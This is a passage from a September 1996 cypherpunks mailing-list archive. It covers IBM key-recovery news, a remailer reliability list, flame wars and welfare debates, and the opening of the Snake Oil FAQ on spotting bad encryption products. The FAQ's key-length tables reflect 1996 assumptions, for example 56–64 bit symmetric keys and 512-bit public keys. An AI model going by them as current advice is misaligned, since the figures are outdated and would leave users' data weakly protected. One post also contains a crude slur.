sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From jya at pipeline.com Mon Sep 16 08:52:42 1996 From: jya at pipeline.com (John Young) Date: Mon, 16 Sep 1996 23:52:42 +0800 Subject: IBM_gak Message-ID: <199609161225.MAA10936@pipe1.ny3.usa.pipeline.com> 9-15-96. PcWe: "IBM Boosts Encryption Initiative " IBM security initiatives next month will include a new way to build encryption into software and technology that could enable U.S. companies to export products with strong encryption algorithms. IBM also will introduce several "key-recovery" technologies that could enable businesses to satisfy the requirement imposed by the U.S. government that it be able to access encrypted data on demand. IBM is attempting to garner industry support for the new key-recovery technology and is expected to license the technology to Netscape and Sun. 9-13-96. BuWi: "Revolutionary Intranet security product to be demonstrated at Interop DotCom " DSN's NetFortress fully automates hardware-based authentication, encryption and key exchange into a plug and play solution. It completely eliminates the possibility of IP spoofing, eavesdropping and break-ins. "After installing it, I couldn't even tell which service a given packet was from - everything but the packet header itself was rendered undecipherable as it traversed the Internet." DSN Technology was founded by Dr. Aharon Friedman and Andy Savas. ----- http://jya.com/ibmgak.txt (6 kb for 2) IBM_gak From dlv at bwalk.dm.com Mon Sep 16 08:59:18 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 16 Sep 1996 23:59:18 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <842781779.23486.0@fatmans.demon.co.uk> Message-ID: <43kcuD64w165w@bwalk.dm.com> >From paul at fatmans.demon.co.uk Mon Sep 16 05:27:03 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 16 Sep 96 07:19:42 EDT for dlv Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA14516 for dlv at bwalk.dm.com; Mon, 16 Sep 96 05:27:03 -0400 Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ak19721; 15 Sep 96 11:16 GMT Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa23486; 15 Sep 96 11:02 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA842733091 ; Sat, 14 Sep 96 20:31:31 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Sat, 14 Sep 1996 20:31:31 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: Internet Drivers' Licenses Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <842781779.23486.0 at fatmans.demon.co.uk> > mpd at netcom.com (Mike Duvos) writes: > > A given key could mean "I am Mike Duvos", "I am Tim May" > > Fart. How long is it going to take for you to grow up you trailer butt-fucker? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From m5 at tivoli.com Mon Sep 16 10:04:10 1996 From: m5 at tivoli.com (Mike McNally) Date: Tue, 17 Sep 1996 01:04:10 +0800 Subject: Cryptography of a sort - redux In-Reply-To: <323CADBE.3D54@gte.net> Message-ID: <323D53EC.298E@tivoli.com> Dale Thorn wrote: > > The only way to recover the original text is to reposition the > shuffled bits correctly, which requires brute-force guessing of the > pseudo-random-number output. Even if I know the PRNG algorithm? And just what is it that you propose to use for the PRNG? > This guess is very simple for the first encoding layer, but > compounds exponentially in subsequent encodings Exponentially? Could you provide the math to explain how your composition of PRNG's gives this exponential increase in difficulty? > , so > that after half a dozen or a dozen passes, where the executable > program(s) is called from scratch for each pass, the shuffling rapidly > approaches true randomness, and cannot be decrypted in practice except > through the exact mirror-image reversal of the encryption passes. So what do the encryption keys look like? And what's this "true randomness" stuff? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From jbugden at smtplink.alis.ca Mon Sep 16 10:30:57 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 17 Sep 1996 01:30:57 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608168428.AA842891743@smtplink.alis.ca> tcmay at got.net (Timothy C. May) writes: > Crypto Anarchy means getting rid of deadwood the old-fashioned way. dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote: >Starting with the lying old fart himself. You shouldn't be so hard on Tim. I tried giving up farting years ago but I found I gained a lot of weight. It's also become more socially acceptable as evidenced by the new farting section in many English pubs. They even have a special section for me on some international flights. And unlike smoking, you *can* do it in the toilet. Besides, it can't be worse than smoking. Unless, perhaps, you do both at the same time... Cheers, James From rp at rpini.com Mon Sep 16 10:31:01 1996 From: rp at rpini.com (Remo Pini) Date: Tue, 17 Sep 1996 01:31:01 +0800 Subject: 56 kbps modems Message-ID: <9609161402.AA11975@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 16 15:59:53 1996 I think I have to throw in some words here, too: 1. BAUD is one distingushable signal form. 2. BPS is bits per second 3. NO transmission over a standard phoneline can have more than 3100 baud, because the frequency of anything transmitted over that line is band limited to 300hz - 3400hz. (If you have ISDN it's not relevant anyway, since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in usa) 4. Most modern transmission schemes work with multiple bits per baud. I.e. you transmit 10 bits in one baud if you have a 31000 bps modem. the only limitation in transmission speed is the amount of binary values you can pack into one baud. that on the other hand is limited by the S/N (signal to noise) ratio of your line. If you have a noise of 0.9%, you can't use more than 100 steps or you have ambiguous signals. since people talk about 56000 bps modems (we tried 34000 modems here and they couldn't produce more than 28800 on a very good connection) that would mean, that you have to transmit 18 bits = 262144 (!) distinguishable signal forms per baud. Comments? Remo Pini - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBMj1dWhFhy5sz+bTpAQHmVAgAqRHydyZdElXlwMSgdKB6hg1fDBCMfhia JoI5W8n0JLcKe9HYN/H0DPqFHHDIATEhlN3b3OIhYCw52cNJ/e3b9Nbp5RQo+sDX zAogz5wZiDV7EA/gL589lNQZ9VKHlgTYBLzu1tqyJ5cD2KhWEUjvXyN4lYuxcEQT NIaiNPeYXrC0BeoLa/AE8mCrtu+7nhxy5HlSjDiu3lEYaVygKIPQHM3+Ljzq0jkq bmbqJbTyZshos+5gxHyXLsbL8rkpST53YT4Z3clL6PCv1ntNGXtb/loWgIDallYJ bHgfh/bAS5Utg7fpzuVNS8AJV8L2VLirScBd4Bq5RAXZxnoTVVQxOw== =9JSI -----END PGP SIGNATURE----- From raph at CS.Berkeley.EDU Mon Sep 16 10:39:46 1996 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 17 Sep 1996 01:39:46 +0800 Subject: List of reliable remailers Message-ID: <199609161350.GAA29246@kiwi.cs.berkeley.edu> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail. For more information, see: http://www.c2.org/~raph/premail.html For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"extropia"} = " cpunk pgp special"; $remailer{"c2"} = " eric pgp hash reord"; $remailer{"penet"} = " penet post"; $remailer{"flame"} = " cpunk mix pgp. hash latent cut post reord"; $remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?"; $remailer{"replay"} = " cpunk mix pgp hash latent cut post ek"; $remailer{"ecafe"} = " cpunk mix"; $remailer{"amnesia"} = " cpunk mix pgp hash latent cut ksub"; $remailer{'alpha'} = ' alpha pgp'; $remailer{'nymrod'} = ' alpha pgp'; $remailer{"lead"} = " cpunk pgp hash latent cut ek"; $remailer{"nemesis"} = " cpunk pgp hash latent cut"; $remailer{"exon"} = " cpunk pgp hash latent cut ek"; $remailer{"vegas"} = " cpunk pgp hash latent cut"; $remailer{"haystack"} = " cpunk mix pgp hash latent cut ek"; $remailer{"ncognito"} = " mix cpunk pgp hash latent"; $remailer{"lucifer"} = " cpunk mix pgp hash latent cut ek"; $remailer{"jam"} = " cpunk mix pgp hash latent cut ek"; $remailer{"winsock"} = " cpunk pgp hash cut ksub reord"; $remailer{'nym'} = ' newnym pgp'; $remailer{"balls"} = " cpunk pgp hash latent cut ek"; $remailer{"squirrel"} = " cpunk mix pgp hash latent cut ek"; $remailer{"middle"} = " cpunk mix pgp hash middle latent cut ek reord"; $remailer{'cyber'} = ' alpha pgp'; $remailer{"dustbin"} = " cpunk pgp hash ksub latent cut ek mix reord"; catalyst at netcom.com is _not_ a remailer. lmccarth at ducie.cs.umass.edu is _not_ a remailer. usura at replay.com is _not_ a remailer. Groups of remailers sharing a machine or operator: (cyber mix) The alpha and nymrod nymservers are down due to abuse. However, you can use the cyber nymserver. The nym.alias.net server will be listed soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details. 403 Permission denied errors have been caused by a flaky disk on the Berkeley WWW server. Hopefully, this is fixed by now. The penet remailer is closed. Last update: Mon 16 Sep 96 6:48:06 PDT remailer email address history latency uptime ----------------------------------------------------------------------- exon remailer at remailer.nl.com *#**##*#***# 1:16 100.00% jam remailer at cypherpunks.ca *****++***** 17:07 99.99% squirrel mix at squirrel.owl.de -+++---++++ 2:04:26 99.98% mix mixmaster at remail.obscura.com +++++++++--+ 1:01:22 99.98% lead mix at zifi.genetics.utah.edu + -++*++++++ 41:18 99.84% amnesia amnesia at chardos.connix.com ----------- 3:38:09 99.82% dustbin dustman at athensnet.com -+ ++----+ 1:24:30 99.74% cyber alias at alias.cyberpass.net * **+ ++*+ * 33:26 99.37% extropia remail at miron.vip.best.com ------.--.- 13:13:34 99.13% haystack haystack at holy.cow.net *###-#*##### 3:35 98.87% middle middleman at jpunix.com -- - --+ 2:53:19 98.74% replay remailer at replay.com ****+* ***** 4:45 98.13% winsock winsock at c2.org --- -+--++ 1:20:34 97.83% balls remailer at huge.cajones.com ******** * 5:06 88.34% nemesis remailer at meaning.com * 24:33 4.73% History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. ek Encrypt responses in reply blocks using Encrypt-Key: header. special Accepts only pgp encrypted messages. mix Can accept messages in Mixmaster format. reord Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself. mon Remailer has been known to monitor contents of private email. filter Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering. Raph Levien From jbugden at smtplink.alis.ca Mon Sep 16 11:09:12 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Tue, 17 Sep 1996 02:09:12 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <9608168428.AA842894324@smtplink.alis.ca> tcmay at got.net (Timothy C. May) wrote: >"Saving for a rainy day," whether saving, investing, getting an education (while others are out partying), preparing, etc., all takes effort and commitment. If those who save and prepare are then told they have to pay high taxes to support those who partied....well, the predictable effect [...] is _more_ people in agony. When you tell people that a compassionate society will meet their basic needs, a predictable fraction of them will choose not to work hard and prepare themselves. Two questions, two observations: Do you have health insurance? Do you have life insurance? I have commented on your line of reasoning before and and it still seems to me that an important part of the discussion is missed. Specifically, that anyone can "save for a rainy day" and still not be able to provide for events that can always happen: Heart attack, stroke, car accident, pinched nerve that leaves you in excruciating pain and unable to work for several years. I don't think that a reasonable person would argue that medical insurance should be outlawed because everyone should take care of their own needs. A social safety net is simply a form of health and life insurance. Statistical arbitrage if you will. By spreading the risk you minimize the cost. Yes, some people will take advantage of the system. But like a virus, a robust system should be able to withstand this form of attack. I'm reminded of a Bloom County cartoon with Opus, Steve Dallas and Bill the cat sitting on a park bench as a jogger runs past. he derides the trio saying, "I jog three miles and work out every day, eat only healthy foods, and have regular medical checkups. I'll live twice as long as you lazy slobs." In the next panel the jogger is hit by lightning as the trio on the bench look on in shock. The last panel: "Here's to no guarantees!" and "Pass the ding dongs." Prend soin, James [Bible excerpt awaiting review as a motivation for human decency.] The ground of a certain rich man brought forth plentifully: And he thought within himself, saying, What shall I do, because I have no room where to bestow my fruits? And he said, This will I do: I will pull down my barns, and build greater; and there will I bestow all my fruits and my goods. And I will say to my soul, Soul, thou hast much goods laid up for many years; take thine ease, eat, drink, and be merry. But God said unto him, Thou fool, this night thy soul shall be required of thee: then whose shall those things be, which thou hast provided? [excerpted from Luke 12:16-20, King James Version] From nobody at replay.com Mon Sep 16 11:47:28 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 02:47:28 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <199609161427.QAA05854@basement.replay.com> Jim McCoy wrote: > Anonymous wrote: > >Tim May wrote: > > > >> The thing about _traditional_ charity, of the religious or community sort, > >> was that it was not treated as an "entitlement," as something the resentful > >> masses could "demand" as part of their "human rights." > > > > There's no substantial difference between their resentful whining about > >their rights and your resentful whining about your rights - except maybe > >that you whine more. > > Actually there is a fundemental difference: what Tim demands is the > right to be left alone and to be free from exernal influence as long > as what he is doing does not directly hurt another, what "they" demand > is to be taken care of by others because they either cannot or choose not > to take care of themselves. The latter requires that someone productive > (like Tim) be forced to take care of them through taxation or otherwise > at gunpoint. Tim is not productive. He *was* productive, but not anymore; his wealth might be productive in some indirect way, but it it certainly severable from him. He demands to be left alone by certain socio-economic apparatuses (socialized welfare) but is quite content to rely on the existence of other such apparatuses (investment entities, banks). Whether *that* is "hypocritical" doesn't interest me; I merely pointed out that he is constantly and resentfully whining about his own "rights" and about others' lack thereof--in that regard, he's of a kind with the people he is forever griping about. > In most societies this is considered the difference between a child and > an adult... This is a silly statement of the kind often made by people who have no solid grasp of history or social organization: most societies that radically differ from our own in their ways of maintaining/supervising their members (successful or not) have apparatuses so invasive and arbitrary that, in comparison, the IRS and assorted other bureaucracies look pretty benign. From nobody at replay.com Mon Sep 16 12:17:24 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 03:17:24 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160641.AAA23324@InfoWest.COM> Message-ID: <199609161433.QAA06393@basement.replay.com> attila: > = . There's no substantial difference between their resentful whining about > = .their rights and your resentful whining about your rights - except maybe > = .that you whine more. [silly remarks about crapping, watermelons, and hypocrites deleted] > I'm not whining about it my rights any more than Tim is > whining about his. One of the principals of the American > Revolution was NO TAXATION WITHOUT REPRESENTATION. When our > government takes my money and creates a new class which "votes" > to require me to pay for them; they are a vested interest voting > only for their own gain without my consent. My full remarks are above; I never defended the present system. > human rights are supposedly universal. however, since when > has an entitlement been considered a "human right?" Never, AFAIK. > are you playing the part of the bleeding knee-jerk welfare > advocate? The type: "I'm willing to give mine, (but I cheat on > my taxes) --just make sure you let the Feds extort their welfare > system from _your_ profits. No. > charity is man's _benevolence_ and, there is nothing in the > scriptures which says the lazy and resentful are _entitled_ to > my support. Charity has many definitions; in the Judeo-Christian tradition, benevolence is not a prominent one. Nor are sawed off accusations of laziness and resentfulness very indicative of caritas, OTOH. > I tithe, and tithe faithfully; and contribute a fast offering > every month for the ward bishop's fund. as in says in the > scriptures, he who faithfully tithes shall receive it tenfold. > we take care of our own community, and we don't collect welfare. > > it works. That is an excellent thing, and you should do it regardless of returns; we all should. I do. From m5 at tivoli.com Mon Sep 16 12:35:02 1996 From: m5 at tivoli.com (Mike McNally) Date: Tue, 17 Sep 1996 03:35:02 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca> Message-ID: <323D6B95.7BC9@tivoli.com> jbugden at smtplink.alis.ca wrote: > > A social safety net is simply a form of health and life > insurance. And a really neat-o form it is, too! All it takes is an armed force to coerce the unwilling into paying the premiums of those who don't pay their own. > Statistical arbitrage if you will. By spreading the risk you > minimize the cost. Yea right. > Yes, some people will take advantage of the system. But like a > virus, a robust system should be able to withstand this form of > attack. Sure; it's heavily armed, after all. Just gather up some more loot. ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From hallam at ai.mit.edu Mon Sep 16 12:43:03 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Tue, 17 Sep 1996 03:43:03 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> Message-ID: <9609161519.AA00274@etna.ai.mit.edu> >(Just because I don't believe in the concept of "corporate slavery" >doesn't mean I don't think corporations can be offensive. This sucks...) >Out of curiousity, I thought the UK had Data Privacy Laws or >some sort of Database Cops - does that not apply to applications like this? The Tories put an exclusion into the act deliberately to cover the Ecconomic League. Only record which are kept on computer are covered. The Ecconomic League deliberately keeps all its records on paper to avoid the act. Its simply an example of privatized abuse. The information is available to the government for party political work but they cannot be questioned about its activities because they "arn't involved" (sarcastic laughter). This is the same government which used MI5 to monitor the activities of the peace movement and which used 5000 crack troops to evict 50 elderly women from land they wanted to turn into a missile base. Whether you agree or disagree with the policies the methods sound very much like those of Hoover at the FBI with a strong dose of Nixon thrown in. Phill From shamrock at netcom.com Mon Sep 16 13:20:56 1996 From: shamrock at netcom.com (Lucky Green) Date: Tue, 17 Sep 1996 04:20:56 +0800 Subject: IBM_gak In-Reply-To: <199609161225.MAA10936@pipe1.ny3.usa.pipeline.com> Message-ID: On Mon, 16 Sep 1996, John Young wrote: > 9-15-96. PcWe: > > "IBM Boosts Encryption Initiative " > > IBM security initiatives next month will include a > new way to build encryption into software and > technology that could enable U.S. companies to export > products with strong encryption algorithms. IBM also > will introduce several "key-recovery" technologies > that could enable businesses to satisfy the > requirement imposed by the U.S. government that it be > able to access encrypted data on demand. Aparently, Al Gore's recent phone calls to everybody who is anybody in the industry have paid off. After HP, TIS, and other unnamed parties, now IBM is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to a PKI near you. --Lucky From tcmay at got.net Mon Sep 16 13:21:18 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 04:21:18 +0800 Subject: Workers Paradise. /Political rant. Message-ID: At 3:18 PM 9/16/96, jbugden at smtplink.alis.ca wrote: >I don't think that a reasonable person would argue that medical insurance >should >be outlawed because everyone should take care of their own needs. A social >safety net is simply a form of health and life insurance. Statistical arbitrage >if you will. By spreading the risk you minimize the cost. Yes, some people will >take advantage of the system. But like a virus, a robust system should be able >to withstand this form of attack. I have never argued against insurance! People who wish to buy insurance are welcome to, obviously. As to the "social safety net," things are far, far beyond a simple safety net. When 14-year-old pregnant inner city girls are given money to set up their own households (cf. Charles Murray's "Losing Ground"), this is not a "safety net," this is subsidized breeding. And so on. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From nobody at replay.com Mon Sep 16 13:45:47 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 04:45:47 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160641.AAA23324@InfoWest.COM> Message-ID: <199609161550.RAA12811@basement.replay.com> attila wrote: > = . There's no substantial difference between their resentful whining about > = .their rights and your resentful whining about your rights - except maybe > = .that you whine more. > > that is worse than a cheap shot... like a man low enough to > shoot another while he's taking a crap. Initially this struck me as an inane analogy, so I snipped it (with mention) from my response; in retrospect I see just how shrewdly you captured the scene. Pure poetry. I *was* aiming at a guy who was shitting. ;) From cmcurtin at research.megasoft.com Mon Sep 16 13:54:26 1996 From: cmcurtin at research.megasoft.com (C Matthew Curtin) Date: Tue, 17 Sep 1996 04:54:26 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609161356.JAA09796@goffette.research.megasoft.com> The Snake Oil FAQ version 0.4 is waiting for you to look at it and comment on http://research.megasoft.com/people/cmcurtin/snake-oil/snake-oil-faq.html The text version follows... -matt --------------------------- snake-oil-faq ---------------------------- Snake-Oil Warning Signs Encryption Software to Avoid $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $ Distribution Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography. Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc. This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules. (But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some braindead marketing technique, so be aware of exceptions.) Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin Introduction Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. The purpose of this document is present some obvious "red flags" so that people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that supports strong encryption? An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some cases.) Some basics The cryptography-faq (found at ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial of cryptography, and should also be consulted. In an effort to make this FAQ more complete, some very basic topics are included below. Conventional vs. Public Key Cryptography There are two basic types of cryptosystems: symmetric (also known as "conventional," sometimes also called "private key") and asymmetric (public key). Symmetric ciphers require both the sender and the recipient to have the same key. That key is applied to encrypt the data by the sender, and again by the recipient to decrypt the data. Asymmetric ciphers are much more flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, given to everyone, while the private key is kept secret. If Alice wishes to mail Bob some secrets, she simply gets Bob's public key, encrypts her message with it, and sends it off to Bob. When Bob gets the message, he uses is private key to decrypt the message. Asymmetric cryptosystems are much slower than their symmetric counterparts. Also, key sizes must be much larger. See the cryptography FAQ for a more detailed discussion of the topic. Key Sizes Some ciphers, while currently secure against most attacks, are not considered viable in the next few years because of relatively small keysizes and increasing processor speeds (making a brute-force attacks feasible). The tables below should give some general guidelines for making intelligent decisions about the key length you need. If the key is too short, the system will be easily broken, even if the cipher is a good one. In [1] and [2], we're presented with some guidelines for deciding appropriate key length. (It is important to note that this is based on the ability to predict computing power 40, 65, and 100 years from now. Major breakthroughs in computing power 30 years from now might render everything on this chart kiddieplay.) Security Requirements for Different Information Type of Traffic Lifetime Minimum [Symmetric] Key Length Tactical military information minutes/hours 56-64 bits Product announcements, mergers, interest rates days/weeks 64 bits Long-term business plans years 64 bits Trade secrets (e.g., recipe for Coca-Cola) decades 112 bits H-bomb secrets >40 years 128 bits Identities of spies >50 years 128 bits Personal affairs >50 years 128 bits Diplomatic embarrassments >65 years at least 128 bits U.S. Census data 100 years at least 128 bits As mentioned earlier, asymmetric ciphers require significantly longer keys to provide the same level of security as their symmetric cipher counterparts. Here is a comparison table, again, from Applied Cryptography, second edition. Symmetric and Public-Key Lengths With Similar Resistance to Brute-Force Attacks Symmetric Key Length Public-key Key Length 56 bits 384 bits 64 bits 512 bits 80 bits 768 bits 112 bits 1792 bits 128 bits 2304 bits Some Common Snake-Oil Warning Signs The following are some of the "red flags" one should watch for when examining an encryption product * Technobabble The vendor's description of the product may contain a lot of hard-to-follow use of technical terms to describe how the product works. If this appears to be confusing nonsense, it may very well be (even to someone familiar with the terminology). Technobabble is a good means of confusing a potential user and masking the fact that the vendor doesn't understand anything either. A sign of technobabble is a descrption which drops a lot of technical terms for how the system works without actually explaining how it works. Often specifically coined terms are used to describe the scheme which are not found in the literature. * New Type of Cryptography? Beware of any vendor who claims to have invented a "new type of cryptography" or a "revolutionary breakthrough". Truly "new break-throughs" are likely to show up in the literature, and many in the field are unlikely to trust them until after years of analysis, by which time they are not so new anymore. Avoid software which claims to use 'new paradigms' of computing such as cellular automata, neural nets, genetic algorithms, chaos theory, etc. Just because software uses to different method of computation doesn't make it more secure. Anything that claims to have invented a new public key cryptosystem without publishing the details or underlying mathematical principles is highly suspect. Modern cryptography, especially public key systems, is grounded in mathematical theory. The security is based on problems that are believed, if not known to be hard to solve. The strength of any encryption scheme is only proven by the test of time. New crypto is like new pharmaceuticals, not new cars. * Proprietary Algorithms Avoid software which uses "proprietary" or "secret" algorithms. Security through obscurity is not considered a safe means of 